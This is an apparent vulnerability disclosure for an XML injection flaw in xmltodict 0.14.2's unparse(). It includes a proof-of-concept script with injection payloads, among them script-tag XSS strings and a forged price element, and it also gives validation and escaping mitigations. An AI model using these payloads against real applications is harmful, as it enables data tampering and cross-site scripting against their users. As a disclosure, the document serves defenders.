CVE-2025-9375: XML Injection Vulnerability in xmltodict 0.14.2 - Mono

2025-08-25

Executive Summary

I discovered an XML injection vulnerability in xmltodict version 0.14.2, a popular Python library with over 1.5 million weekly downloads on PyPI. The vulnerability allows attackers to inject arbitrary XML markup through crafted dictionary keys passed to xmltodict.unparse(), potentially leading to XML structure manipulation, data corruption, and, in web contexts, cross-site scripting (XSS) attacks.

The vulnerability stems from insufficient input validation in the _emit function, where user-controlled dictionary keys are directly used as XML tag names without any sanitization or validation.

Background: Understanding xmltodict

xmltodict is a Python library that provides bidirectional conversion between XML and Python dictionaries. Its primary functions are:

xmltodict.parse() - Converts XML to Python dictionaries
xmltodict.unparse() - Converts Python dictionaries back to XML

The library is widely used in web applications, APIs, and data processing pipelines where XML manipulation is required. Its popularity makes this vulnerability particularly concerning from a supply chain security perspective.

Technical Analysis

The Vulnerable Code Path

The vulnerability resides in the _emit function within xmltodict.py (lines 378-451). Let’s examine the critical code path:

def _emit(key, value, content_handler,
          attr_prefix='@',
          cdata_key='#text',
          depth=0,
          preprocessor=None,
          pretty=False,
          newl='\n',
          indent='\t',
          namespace_separator=':',
          namespaces=None,
          full_document=True,
          expand_iter=None):
    key = _process_namespace(key, namespaces, namespace_separator, attr_prefix)
    if preprocessor is not None:
        result = preprocessor(key, value)
        if result is None:
            return
        key, value = result
    # ... processing logic ...

    # VULNERABLE LINE: Direct use of user input as XML tag
    content_handler.startElement(key, AttributesImpl(attrs))  # Line 436

    # ... more processing ...

    content_handler.endElement(key)  # Line 449

Root Cause Analysis

The vulnerability occurs because:

No Input Validation: The key parameter (dictionary keys from user input) is used directly as an XML element name
Missing Sanitization: No escaping or validation is performed on the key before passing it to startElement()
Trust Assumption: The code assumes dictionary keys are safe XML tag names
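
The behavior described above can be reproduced without xmltodict. As far as I can tell, unparse() passes its keys to the standard library's xml.sax.saxutils.XMLGenerator, which escapes character data but writes element names verbatim. The sketch below works under that assumption; emit_element is a hypothetical helper written only for this illustration and is not xmltodict's actual code.

```python
import io
from xml.sax.saxutils import XMLGenerator
from xml.sax.xmlreader import AttributesImpl


def emit_element(name, text):
    """Hypothetical helper: write one element the way a SAX generator does."""
    buf = io.StringIO()
    gen = XMLGenerator(buf, encoding="utf-8")
    gen.startElement(name, AttributesImpl({}))  # name is written as-is
    gen.characters(text)                        # text content is escaped
    gen.endElement(name)                        # name is written as-is again
    return buf.getvalue()


# Markup in a *value* is escaped and therefore neutralized.
print(emit_element("item", "<b>bold</b>"))

# Markup in the *name* is not escaped and lands in the output unchanged.
print(emit_element("item><injected/><item", "value"))
```

The asymmetry is the point: values go through escaping, names do not, so any validation of names has to happen before the generator is called.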

XML Tag Name Requirements vs Reality

Valid XML tag names must follow these rules:

Start with a letter, underscore, or colon (the colon is conventionally reserved for namespace prefixes)
Contain only letters, digits, hyphens, periods, underscores, and colons
Cannot contain whitespace or markup characters such as <, >, and &

The vulnerability exploits the fact that xmltodict doesn’t enforce these constraints.

Exploitation Scenarios

Basic XML Structure Manipulation

Payload:

malicious_data = {"item><injected>malicious content</injected><item": "value"}
xml_output = xmltodict.unparse(malicious_data, full_document=False)
print(xml_output)

Output:

<item><injected>malicious content</injected><item>value</item><injected>malicious content</injected><item>

The injected XML breaks the intended structure and introduces arbitrary elements.
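
One practical consequence is worth spelling out: the output above is not well-formed XML, because the injected key leaves elements unclosed. A strict parser should therefore reject it, while lenient consumers (HTML renderers, regex-based extractors) may still act on the injected markup. The sketch below checks this with the standard library's xml.etree.ElementTree; is_well_formed is a hypothetical helper name, not part of xmltodict.

```python
import xml.etree.ElementTree as ET


def is_well_formed(xml_text):
    """Hypothetical helper: True if a strict XML parser accepts the text."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return True


# The injected output from the example, split only for readability.
injected = (
    "<item><injected>malicious content</injected><item>value"
    "</item><injected>malicious content</injected><item>"
)

print(is_well_formed("<item>value</item>"))  # a benign document
print(is_well_formed(injected))              # the injected output
```

Running a check like this on generated XML before it leaves the application is a cheap safety net, but it may not catch a payload that is crafted to stay well-formed, so it complements key validation rather than replacing it.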

Advanced Multi-Stage Injection

Payload:

complex_payload = {
    "product><price>999999</price><description>HACKED": "legitimate_value",
    "legitimate_field": "normal_data"
}

This could manipulate e-commerce XML data by injecting false pricing information.

Web Application Context

In web applications that render XML output in browsers:

Payload:

xss_payload = {"item><script>alert('XSS')</script><item": "data"}

When the resulting XML is embedded in an HTML page, or served with an HTML content type, without proper escaping, the browser can execute the injected JavaScript.
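
If generated XML has to be displayed inside an HTML page, one defensive option is to escape it at the point of rendering, independently of how the XML was produced. The following is a minimal sketch using the standard library's html.escape; render_xml_for_html is a hypothetical helper, and wrapping the result in a pre element is only an assumption about how the page displays it.

```python
import html


def render_xml_for_html(xml_text):
    """Hypothetical helper: make XML text safe to show inside an HTML page."""
    # html.escape converts <, >, & and quotes into character references,
    # so the browser displays the markup instead of interpreting it.
    return "<pre>" + html.escape(xml_text) + "</pre>"


xml_output = "<item><script>alert('XSS')</script><item>data</item>"
print(render_xml_for_html(xml_output))
```

This addresses only the display path. It does not repair the corrupted XML itself, which still needs key validation at the source.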

Proof of Concept

Here’s a complete demonstration:

#!/usr/bin/env python3
import xmltodict

def demonstrate_xml_injection():
    """Demonstrates the XML injection vulnerability"""

    print("=== CVE-2025-9375 XML Injection PoC ===\n")

    # Test Case 1: Basic structure breaking
    print("1. Basic XML structure manipulation:")
    payload1 = {"item><injected>MALICIOUS CONTENT</injected><dummy": "value"}
    result1 = xmltodict.unparse(payload1, full_document=False)
    print(f"Input: {payload1}")
    print(f"Output: {result1}")
    print()

    # Test Case 2: Attribute injection
    print("2. Attribute injection:")
    payload2 = {"item attribute='malicious'": "value"}
    result2 = xmltodict.unparse(payload2, full_document=False)
    print(f"Input: {payload2}")
    print(f"Output: {result2}")
    print()

    # Test Case 3: CDATA breaking
    print("3. CDATA section injection:")
    payload3 = {"item><![CDATA[]]><script>alert('XSS')</script><dummy": "value"}
    result3 = xmltodict.unparse(payload3, full_document=False)
    print(f"Input: {payload3}")
    print(f"Output: {result3}")
    print()

if __name__ == "__main__":
    demonstrate_xml_injection()

Expected Output:

=== CVE-2025-9375 XML Injection PoC ===

1. Basic XML structure manipulation:
Input: {'item><injected>MALICIOUS CONTENT</injected><dummy': 'value'}
Output: <item><injected>MALICIOUS CONTENT</injected><dummy>value</item><injected>MALICIOUS CONTENT</injected><dummy>

2. Attribute injection:
Input: {"item attribute='malicious'": 'value'}
Output: <item attribute='malicious'>value</item attribute='malicious'>

3. CDATA section injection:
Input: {"item><![CDATA[]]><script>alert('XSS')</script><dummy": 'value'}
Output: <item><![CDATA[]]><script>alert('XSS')</script><dummy>value</item><![CDATA[]]><script>alert('XSS')</script><dummy>

Impact Assessment

Real-World Impact Scenarios

API Data Corruption: REST APIs using xmltodict for XML responses could have their data structure corrupted
Configuration File Manipulation: Applications that generate XML config files could be compromised
Web Application XSS: When XML output is rendered in browsers, XSS attacks become possible
Data Processing Pipelines: ETL processes could inject malicious data into downstream systems
Document Generation: PDF or report generators using XML templates could be manipulated

Affected Systems

Any application using xmltodict.unparse() with user-controlled dictionary keys is vulnerable:

Web APIs converting JSON to XML
Configuration management systems
Data transformation pipelines
Document generation services
Integration platforms

Mitigation Strategies

Input Validation: Validate dictionary keys before passing to unparse()

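import re

def safe_xml_key(key):
    # Only allow keys made of valid XML name characters (ASCII subset).
    # fullmatch is used because re.match with '$' also accepts a trailing newline.
    return isinstance(key, str) and re.fullmatch(r'[a-zA-Z_][a-zA-Z0-9_.-]*', key) is not None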

Key Sanitization: Sanitize keys to remove dangerous characters

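import re

def sanitize_dict_keys(data):
    # Recursively replace characters that are not valid in an XML name
    if isinstance(data, dict):
        sanitized = {}
        for key, value in data.items():
            # Replace invalid characters
            safe_key = re.sub(r'[^a-zA-Z0-9_.-]', '_', str(key))
            sanitized[safe_key] = sanitize_dict_keys(value)
        return sanitized
    if isinstance(data, list):
        # Lists become repeated elements, so sanitize each item too
        return [sanitize_dict_keys(item) for item in data]
    return data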
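
Sanitizing silently rewrites data, and two different keys can collapse into the same sanitized key (for example, "a<b" and "a>b" both become "a_b"), so one entry overwrites the other. An alternative is to reject bad input outright. The sketch below walks a nested structure and collects every key that is not a plain XML name. find_unsafe_keys is a hypothetical helper, and its special handling of '@' and '#text' assumes the default attr_prefix and cdata_key values visible in the _emit signature; it also assumes attribute names deserve the same check as element names.

```python
import re

# ASCII subset of XML names; real XML allows more characters (and colons).
_NAME_RE = re.compile(r'[A-Za-z_][A-Za-z0-9_.-]*')


def find_unsafe_keys(data, attr_prefix='@', cdata_key='#text', path=''):
    """Hypothetical helper: return paths of keys that are not safe XML names."""
    unsafe = []
    if isinstance(data, dict):
        for key, value in data.items():
            here = f"{path}/{key}"
            name = key
            if key == cdata_key:
                name = None  # text content marker, not an element name
            elif isinstance(key, str) and key.startswith(attr_prefix):
                name = key[len(attr_prefix):]  # attribute name after the prefix
            if name is not None and not (
                isinstance(name, str) and _NAME_RE.fullmatch(name)
            ):
                unsafe.append(here)
            unsafe.extend(find_unsafe_keys(value, attr_prefix, cdata_key, here))
    elif isinstance(data, list):
        for item in data:
            unsafe.extend(find_unsafe_keys(item, attr_prefix, cdata_key, path))
    return unsafe


payload = {
    "order": {
        "@id": "42",
        "item><injected/><item": "value",
        "note": [{"#text": "ok"}, {"bad key": "x"}],
    }
}
print(find_unsafe_keys(payload))
```

A caller would refuse to pass the data to unparse() whenever the returned list is non-empty, and could log the offending paths for investigation. Namespaced keys containing a colon are flagged by this pattern, so applications that rely on namespaces would need to loosen it deliberately.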